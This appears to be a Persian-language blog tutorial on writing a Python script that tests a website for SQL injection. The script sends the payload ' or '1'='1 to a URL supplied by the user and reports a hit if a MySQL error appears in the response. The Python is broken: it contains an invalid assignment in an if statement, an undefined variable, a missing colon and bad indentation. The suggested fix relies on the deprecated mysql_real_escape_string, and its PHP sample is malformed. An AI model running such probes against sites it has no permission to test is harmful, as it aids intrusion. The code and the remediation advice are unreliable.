فوریه 24, 2019 Mostafa بدون دیدگاه

اگر دنبال برنامه نویس برای ساخت افزونه ،قالب،سایت،برنامه ویندوز،اپلیکیشین اندروید،ربات تلگرام و.... هستید ،سفارش برنامه نویسی را مطالعه نمایید.

توجه : درخواست افزونه ،قالب، اسکریپت و نرم افزار و ... و سوالات و مشکلات خود را در انجمن ارسال نمایید

با سلام خدمت کاربران عزیز در این ترفند قصد دارم گام گام باهم کدی برای بررسی آسیب پذیری SQL Injection یک سایت با استفاده از Python را بنویسیم، پس با من همراه باشید.

نیازمندی ها :

۱) Python 3.4

۲) اینترنت

۳ ) یک سایت آسیب پذیر

۴ ) سیستم عامل لینوکس یا ویندوز

گام ها :

۱ – خب پس از نصب برنامه را اجرا و یک فایل با پسوند py ایجاد نمایید.

۲ – ابتدا کتابخانه های مورد نیاز را همانند زیر وارد نمایید.

import sys
import urllib
import urllib.request

نکته : کلمه import برای ورود کتابخانه استفاده می شود.

۳ –  از دستور input(“”) برای دریافت ورودی از کاربر استفاده نمایید.

fullurl = input("Please Enter Your Vulnerable Url :")

۴ – بررسی داده

if carg in sys.argv:
	if carg="-w":
	argnum = sys.argv.index(carg)
	argnum +=1
	fullurl = sys.argv[argnum]

۵ – ایجاد یک web request

resp = urllib.request.urlopen(fullurl + "=1\' or \'1\' = \'1\'")
body = resp.read()
fullbody = body.decode('utf-8')

۶ – بررسی آسیب پذیر بودن وب سایت

if "You have an error in your SQL syntax" in fullbody
	print("the website is classic SQL injection vulnerable!")
    else:
	print("the website is not classic SQL injection vulnerable!")

 

نکته : برای برطرف کردن این آسیب پذیری در سایت خود کافیست از تابع mysql_real_escape_string برای مقادیر استفاده شده در کوئری های خود استفاده نمایید، به مثال زیر توجه نمایید :
$query ="SELECT * FROM users where 
		user='". mysql_real_escape_string($username)."' 
		AND 
		password='".mysql_real_escape_string($password)."'");

برچسب ها